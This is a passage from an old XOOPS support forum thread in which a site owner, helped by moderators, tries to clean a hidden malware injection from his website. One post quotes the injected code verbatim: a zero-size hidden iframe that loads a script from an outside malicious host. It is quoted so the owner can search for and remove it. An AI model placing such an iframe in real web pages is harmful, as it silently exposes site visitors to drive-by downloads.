11
tesolguy
Re: Pages Loading to the Bottom Problem?
  • 2008/8/11 12:36

  • tesolguy

  • Just popping in

  • Posts: 15

  • Since: 2008/8/4 2


Mamba, any idea on how to eliminate it? Does XOOPS offer a utility for this or do I need to purchase something?
Thanks

12
Mamba
Re: Pages Loading to the Bottom Problem?
  • 2008/8/11 13:15

  • Mamba

  • Moderator

  • Posts: 11256

  • Since: 2004/4/23


I don't know - I would do a backup of the database, and then reinstall it, but first delete everything from there.

Anybody with a better suggestion?
Support XOOPS => DONATE
Use 2.5.10 | Docs | Modules | Bugs

13
tesolguy
Re: Pages Loading to the Bottom Problem?
  • 2008/8/13 21:57

  • tesolguy

  • Just popping in

  • Posts: 15

  • Since: 2008/8/4 2


Mamba, would you be willing to open my site again with IE 7.0 and tell me if it gives you that warning again? (www.christianesl.com)

"virus found JS/Downloader.Agent.
Detected on open."

I removed all the links and I hope its good now.

If not that is fine. thanks

14
Mamba
Re: Pages Loading to the Bottom Problem?
  • 2008/8/13 22:01

  • Mamba

  • Moderator

  • Posts: 11256

  • Since: 2004/4/23


WARNING

Viruses still there!!!
Support XOOPS => DONATE
Use 2.5.10 | Docs | Modules | Bugs

15
tesolguy
Re: Pages Loading to the Bottom Problem?
  • 2008/8/13 22:07

  • tesolguy

  • Just popping in

  • Posts: 15

  • Since: 2008/8/4 2


thanks, what a pain . . .ugh

16
Mamba
Re: Pages Loading to the Bottom Problem?
  • 2008/8/13 22:17

  • Mamba

  • Moderator

  • Posts: 11256

  • Since: 2004/4/23


You should get some anti-virus software for your browser, e.g. the free software from AVG.

You should also run a "Search & Destroy" on your PC, to make sure that those viruses are not on your PC as well.
Support XOOPS => DONATE
Use 2.5.10 | Docs | Modules | Bugs

17
trabis
Re: Pages Loading to the Bottom Problem?
  • 2008/8/13 22:34

  • trabis

  • Core Developer

  • Posts: 2269

  • Since: 2006/9/1 1


tesolguy, check your theme.html or download your site and run a program to search your files for this:
<iframe src="http://uokill.zh.od.ua/su/in.cgi?20" width="0" height="0" frameborder="0"></iframe>


Werever you find it remove it. Also change your ftp password because there is how you were hacked. Get a good ftp program and protect your pc with a firewall And an iron lock.

Good luck!

PS:You can use the program InfoRapid "Search and Replace" (look in google).

18
blondie10101
Re: Pages Loading to the Bottom Problem?

Hi,

I got the same issue on my site.

I finally found it in a custom module.

So far I don't know how they put it there but was successfull in removing it.

It was inserted in an iframe withing a custom block.

Make sure to search for iframes in all your custom blocks (from the administration page).

19
tesolguy
Re: Pages Loading to the Bottom Problem?
  • 2008/8/14 22:00

  • tesolguy

  • Just popping in

  • Posts: 15

  • Since: 2008/8/4 2


Trabis/anyone

I searched all my custom blocks and found nothing. I also checked themes and it was fine.

When I open my main site and view the source I can see it at the bottom in an iframe just as Trabis described. Its at the bottom of every page of my site.

How do I get rid of it?

20
trabis
Re: Pages Loading to the Bottom Problem?
  • 2008/8/14 22:10

  • trabis

  • Core Developer

  • Posts: 2269

  • Since: 2006/9/1 1


Do as I told you in previous post. Backup your site and then use a program to find in your backup files the malicious expression.

Login

Who's Online

68 user(s) are online (41 user(s) are browsing Support Forums)


Members: 0


Guests: 68


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Aug 31
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits